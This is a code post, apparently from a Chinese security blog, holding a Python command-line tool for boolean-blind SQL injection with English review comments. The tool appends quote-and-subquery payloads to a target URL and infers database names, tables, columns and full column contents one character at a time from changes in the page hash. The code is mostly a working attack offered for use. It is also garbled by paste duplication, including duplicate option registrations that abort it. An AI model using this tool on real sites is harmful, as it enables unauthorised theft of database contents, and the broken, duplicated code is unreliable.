代码展示墙：
先将代码保存在这里，解析以后会补上。
# -*- coding: utf-8 -*-
import requests
import sys
import hashlib
from optparse import OptionParser
parser=OptionParser()
# The five lines above are repeated verbatim here. This looks like a paste
# duplication (the page header says the code was saved first and the write-up
# deferred). Re-importing is harmless; `parser` is rebound to a second
# OptionParser and the options below are attached to that second instance.
import requests
import sys
import hashlib
from optparse import OptionParser
parser=OptionParser()
# Command-line surface: -U/--Url is the URL under test; -D/-T/-C select how
# deep the enumeration goes (see select() at the bottom of the file).
parser.add_option("-D", "--Database", action="store",type="string",dest="database",help="Please input test databases")
parser.add_option("-T", "--Table",action="store",type="string",dest="table",help="Please input test table")
parser.add_option("-C", "--Column",action="store",type="string",dest="column",help="Please input test column")
parser.add_option("-U","--Url", action="store",type="string",dest="url",help="Please input test url")
# -T, -C and -U are registered a second time. optparse's default conflict
# handler ("error") raises OptionConflictError when an option string is added
# to the same parser twice, so as pasted the script aborts on the next line,
# before parse_args() is reached. Presumably another paste duplication.
parser.add_option("-T", "--Table",action="store",type="string",dest="table",help="Please input test table")
parser.add_option("-C", "--Column",action="store",type="string",dest="column",help="Please input test column")
parser.add_option("-U","--Url", action="store",type="string",dest="url",help="Please input test url")
# `options` is a module-level global read by select(); `args` is unused.
(options,args) = parser.parse_args()
def md5(str):
    """Return the hex MD5 digest of *str* (a byte string; Python 2 ``str``).

    Used only as a cheap fingerprint for telling two HTTP response bodies
    apart, not for anything security-relevant. The parameter name shadows the
    builtin but is kept because callers may pass it by name.
    """
    return hashlib.md5(str).hexdigest()
def http_get(url):
    """Issue a plain GET for *url* and return the raw response body (bytes).

    No timeout and no error handling are applied: a connection failure
    propagates as a requests exception, and an unresponsive server blocks the
    caller indefinitely.
    """
    response = requests.get(url)
    body = response.content
    return body
def getAllDatabases(url):
    """Enumerate schema names from information_schema one character at a time.

    Every value (schema count, each name's length, each character's ASCII
    code) is obtained through main(), i.e. by a binary search driven by a
    boolean oracle on the HTTP response. In terms of traffic this is many GETs
    to the same URL that differ only in the trailing numeric comparison.
    """
    # how many schemas exist
    db_nums_payload = "select count(schema_name) from information_schema.schemata"
    db_numbers=main(url,db_nums_payload)
    db_name=""
    for i in range(db_numbers):
        # length of the i-th schema name (`limit i,1` is 0-based)
        db_len_payload="select length(schema_name) from information_schema.schemata limit %d,1" % i
        db_name_numbers=main(url,db_len_payload)
        for x in range(1,db_name_numbers+1):
            # substr() positions are 1-based, hence range(1, len+1)
            db_lenc_payload="select ascii(substr((select schema_name from information_schema.schemata limit %d,1),%d,1))" % (i,x)
            db_name+=chr(main(url,db_lenc_payload))
        # "Database #%d is named: %s"
        print("第%d个数据库的名称为:%s" % (i+1,db_name))
        db_name=""
    # The body above is repeated verbatim below (paste duplication, as elsewhere
    # in this file). It must belong to the function, since main(url, ...) cannot
    # run at module level where `url` is unbound; so the whole enumeration is
    # simply performed a second time.
    db_nums_payload = "select count(schema_name) from information_schema.schemata"
    db_numbers=main(url,db_nums_payload)
    db_name=""
    for i in range(db_numbers):
        db_len_payload="select length(schema_name) from information_schema.schemata limit %d,1" % i
        db_name_numbers=main(url,db_len_payload)
        for x in range(1,db_name_numbers+1):
            db_lenc_payload="select ascii(substr((select schema_name from information_schema.schemata limit %d,1),%d,1))" % (i,x)
            db_name+=chr(main(url,db_lenc_payload))
        print("第%d个数据库的名称为:%s" % (i+1,db_name))
        db_name=""
def main(url,payload):
    """Resolve the integer value of a scalar sub-query using the page as a boolean oracle.

    url     -- the URL under test, including the injectable parameter and value
    payload -- a sub-query yielding one integer (a count, a length or an ASCII
               code); the getAll* functions build these

    The unmodified page is hashed once as the baseline. Each probe appends
    ``' and (<payload>) > <mid> --+`` to the URL and hashes that response: an
    unchanged page is read as "true" (value > mid) and the window moves up,
    otherwise a second probe with mid-1 decides whether mid is the exact
    value. Returns int(mid) when found. If the window empties the function
    falls off the end and returns None, which makes the callers' range() /
    chr() calls raise.

    From a defender's view the probes are ordinary GETs whose query string
    carries a quote, ``and (select ... information_schema ...)`` and the
    ``--+`` comment terminator, repeated with only the number changing; the
    oracle relies on the full response body differing, not on errors.
    Parameterised queries remove the injection point this depends on.
    """
    low=0
    high=126        # upper bound of 7-bit ASCII; callers pass ascii() results
    a = md5(http_get(url))          # baseline fingerprint of the unmodified page
    while low <= high:
        mid=(low+high)/2            # Python 2 integer division (optparse and md5-over-str suggest Python 2); a float under Python 3
        # select count(schema_name) from information_schema.schemata;
        cc=url + "' and (%s) > %d --+" % (payload,mid)
        b=md5(http_get(cc))
        if a==b:
            # page unchanged -> condition true -> value is greater than mid
            low=mid+1
        else:
            q=mid-1
            c=md5(http_get(url+"' and (%s) > %d --+" % (payload,q)))
            if c==a:
                # value > mid-1 but not > mid  =>  value == mid
                return int(mid)
                break               # unreachable after return
            else:
                high=mid-1
#getAllDatabases('http://192.168.3.104/sqli-labs/Less-8/?id=1')
def select():
    """Dispatch on which command-line options were supplied.

    No options       -> print the help text and exit.
    -U only          -> getAllDatabases
    -U -D            -> getAllTables
    -U -D -T         -> getAllColumnsByTable
    -U -D -T -C      -> getAllContent
    Any other combination (for example -D without -U) matches no branch and
    the function silently does nothing.

    Reads the module-level `options` and `parser` set up at the top of the file.
    """
    # `== None` kept as written; the idiomatic test is `is None`
    if options.url == None and options.database == None and options.table == None and options.column == None:
        print("Please read the help")
        parser.print_help()
        sys.exit()
    elif options.url != None and options.database ==None and options.table == None and options.column == None:
        getAllDatabases(options.url)
    elif options.url != None and options.database !=None and options.table == None and options.column == None:
        getAllTables(options.url,options.database)
    elif options.url != None and options.database !=None and options.table != None and options.column == None:
        # note the argument order: (url, table, database)
        getAllColumnsByTable(options.url,options.table,options.database)
    elif options.url != None and options.database !=None and options.table != None and options.column != None:
        # note the argument order: (url, column, table, database)
        getAllContent(options.url,options.column,options.table,options.database)
    # The if/elif chain is repeated verbatim below (paste duplication). The
    # first copy only exits in the no-option case, so for every other case the
    # same enumeration is run a second time.
    if options.url == None and options.database == None and options.table == None and options.column == None:
        print("Please read the help")
        parser.print_help()
        sys.exit()
    elif options.url != None and options.database ==None and options.table == None and options.column == None:
        getAllDatabases(options.url)
    elif options.url != None and options.database !=None and options.table == None and options.column == None:
        getAllTables(options.url,options.database)
    elif options.url != None and options.database !=None and options.table != None and options.column == None:
        getAllColumnsByTable(options.url,options.table,options.database)
    elif options.url != None and options.database !=None and options.table != None and options.column != None:
        getAllContent(options.url,options.column,options.table,options.database)
def getAllTables(url,database):
    """Enumerate table names of *database* via information_schema.tables.

    Same scheme as getAllDatabases: count, then per-table name length, then
    one main() call per character. *database* is spliced into the sub-queries
    by string concatenation / %-formatting, unquoted apart from the literal
    single quotes in the templates.
    """
    tb_nums_payload = "select count(table_name) from information_schema.tables where table_schema='"+database+"'"
    tb_numbers=main(url,tb_nums_payload)
    tb_name=""
    for i in range(tb_numbers):
        # NOTE(review): this length query has no `where table_schema=...`
        # filter, while the character query below does, so the i-th row here
        # and the i-th row there are not necessarily the same table.
        tb_len_payload="select length(table_name) from information_schema.tables limit %d,1" % i
        tb_name_numbers=main(url,tb_len_payload)
        for x in range(1,tb_name_numbers+1):
            # substr() is 1-based
            tb_lenc_payload="select ascii(substr((select table_name from information_schema.tables where table_schema='%s' limit %d,1),%d,1))" % (database,i,x)
            tb_name+=chr(main(url,tb_lenc_payload))
        # "Table #%d is named: %s"
        print("第%d个表的名称为:%s" % (i+1,tb_name))
        tb_name=""
def getAllColumnsByTable(url,table,database):
    """Enumerate column names of *table* via information_schema.columns.

    Same count / length / per-character scheme as getAllDatabases. Note that
    the *database* parameter is never used: all three sub-queries filter on
    table_name only, so a table name that exists in several schemas yields the
    union of their columns.
    """
    cl_nums_payload = "select count(column_name) from information_schema.columns where table_name='"+table+"'"
    cl_numbers=main(url,cl_nums_payload)
    cl_name=""
    for i in range(cl_numbers):
        cl_len_payload="select length(column_name) from information_schema.columns where table_name='%s' limit %d,1" % (table,i)
        cl_name_numbers=main(url,cl_len_payload)
        for x in range(1,cl_name_numbers+1):
            # substr() is 1-based
            cl_lenc_payload="select ascii(substr((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1))" % (table,i,x)
            cl_name+=chr(main(url,cl_lenc_payload))
        # "Column #%d is named: %s"
        print("第%d个列的名称为:%s" % (i+1,cl_name))
        cl_name=""
    # Verbatim repeat of the body above (paste duplication); it re-runs the
    # whole enumeration a second time.
    cl_nums_payload = "select count(column_name) from information_schema.columns where table_name='"+table+"'"
    cl_numbers=main(url,cl_nums_payload)
    cl_name=""
    for i in range(cl_numbers):
        cl_len_payload="select length(column_name) from information_schema.columns where table_name='%s' limit %d,1" % (table,i)
        cl_name_numbers=main(url,cl_len_payload)
        for x in range(1,cl_name_numbers+1):
            cl_lenc_payload="select ascii(substr((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1))" % (table,i,x)
            cl_name+=chr(main(url,cl_lenc_payload))
        print("第%d个列的名称为:%s" % (i+1,cl_name))
        cl_name=""
def getAllContent(url,column,table,database):
    """Read every value of *column* in *database*.*table*, character by character.

    Same count / length / per-character scheme as getAllDatabases. The three
    identifiers are %-formatted straight into the sub-queries; the loop uses
    length() and substr(), so each row is printed as text and an empty value
    prints as an empty string.
    """
    ct_nums_payload = "select count(%s) from %s.%s" % (column,database,table)
    ct_numbers=main(url,ct_nums_payload)
    ct_name=""
    for i in range(ct_numbers):
        ct_len_payload="select length(%s) from %s.%s limit %d,1" % (column,database,table,i)
        ct_name_numbers=main(url,ct_len_payload)
        for x in range(1,ct_name_numbers+1):
            # substr() is 1-based
            ct_lenc_payload="select ascii(substr((select %s from %s.%s limit %d,1),%d,1))" % (column,database,table,i,x)
            ct_name+=chr(main(url,ct_lenc_payload))
        # "Content of field #%d: %s"
        print("第%d个字段的内容为:%s" % (i+1,ct_name))
        ct_name=""
    # Verbatim repeat of the body above (paste duplication); it re-runs the
    # whole dump a second time.
    ct_nums_payload = "select count(%s) from %s.%s" % (column,database,table)
    ct_numbers=main(url,ct_nums_payload)
    ct_name=""
    for i in range(ct_numbers):
        ct_len_payload="select length(%s) from %s.%s limit %d,1" % (column,database,table,i)
        ct_name_numbers=main(url,ct_len_payload)
        for x in range(1,ct_name_numbers+1):
            ct_lenc_payload="select ascii(substr((select %s from %s.%s limit %d,1),%d,1))" % (column,database,table,i,x)
            ct_name+=chr(main(url,ct_lenc_payload))
        print("第%d个字段的内容为:%s" % (i+1,ct_name))
        ct_name=""
# Entry point. Runs unconditionally at import time (no `if __name__ == "__main__"` guard).
select()